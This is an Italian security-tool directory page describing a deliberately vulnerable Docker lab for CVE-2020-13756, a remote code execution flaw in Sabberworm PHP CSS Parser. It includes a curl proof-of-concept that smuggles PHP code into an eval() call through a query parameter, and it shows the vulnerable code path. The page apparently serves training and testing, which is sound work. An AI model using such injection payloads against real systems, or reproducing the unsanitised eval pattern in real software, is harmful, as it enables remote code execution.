Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2020-13756-env — Ambiente di test vulnerabile per CVE-2020-13756 (Sabberworm PHP CSS Parser RCE) | Kitploit
Strumenti/GitHubGitHub/kre80r/cve-2020-13756-env
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneLab e Pratica
GitHubkre80r/cve-2020-13756-env

CVE-2020-13756-env

Ambiente di test vulnerabile per CVE-2020-13756 (Sabberworm PHP CSS Parser RCE)

Vedi Repository
19 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Ambiente Vulnerabile CVE-2020-13756

Ambiente di test vulnerabile per CVE-2020-13756 - Remote Code Execution di Sabberworm PHP CSS Parser.

Dettagli della Vulnerabilità

CampoValore
CVECVE-2020-13756
ProdottoSabberworm PHP CSS Parser
Versioni Vulnerabili< 8.3.1
GravitàCritical (CVSS 9.8)
TipoRemote Code Execution

Avvio Rapido (Comando Singolo)

root@kitploit:~
docker run -d -p 8080:80 $(docker build -q https://github.com/KrE80r/CVE-2020-13756-env.git)

Oppure clona ed esegui:

root@kitploit:~
git clone https://github.com/KrE80r/CVE-2020-13756-env.git && cd CVE-2020-13756-env && docker-compose up -d

Configurazione Manuale

root@kitploit:~
# Clone repository
git clone https://github.com/KrE80r/CVE-2020-13756-env.git
cd CVE-2020-13756-env

# Build and run
docker build -t sabberworm-vuln .
docker run -d -p 8080:80 sabberworm-vuln

Verifica della Vulnerabilità

root@kitploit:~
# Test RCE - should print "VULN_TEST" in response
curl "http://localhost:8080/?n=100;printf(%22VULN_TEST%22);"

L'output atteso contiene VULN_TEST all'inizio, dimostrando l'esecuzione di codice.

Test con Nuclei

root@kitploit:~
nuclei -t CVE-2020-13756.yaml -u http://localhost:8080 -debug

Dettagli Tecnici

La vulnerabilità esiste nella funzione getSelectorsBySpecificity() che passa input utente non sanitizzato a eval():

root@kitploit:~
// Vulnerable code path
$selectors = $doc->getSelectorsBySpecificity('> ' . $_GET['n']);
// When n=100;printf("test"); the eval() executes: eval('> 100;printf("test");')

Riferimenti

  • NVD
  • Commit di Correzione
  • Full Disclosure
  • PacketStorm

Dichiarazione di Esclusione di Responsabilità

Questo ambiente è destinato esclusivamente a test di sicurezza autorizzati. Non utilizzarlo contro sistemi senza permesso.

Autore

KrE80r - Ricerca sulla Sicurezza

Scarica lo strumento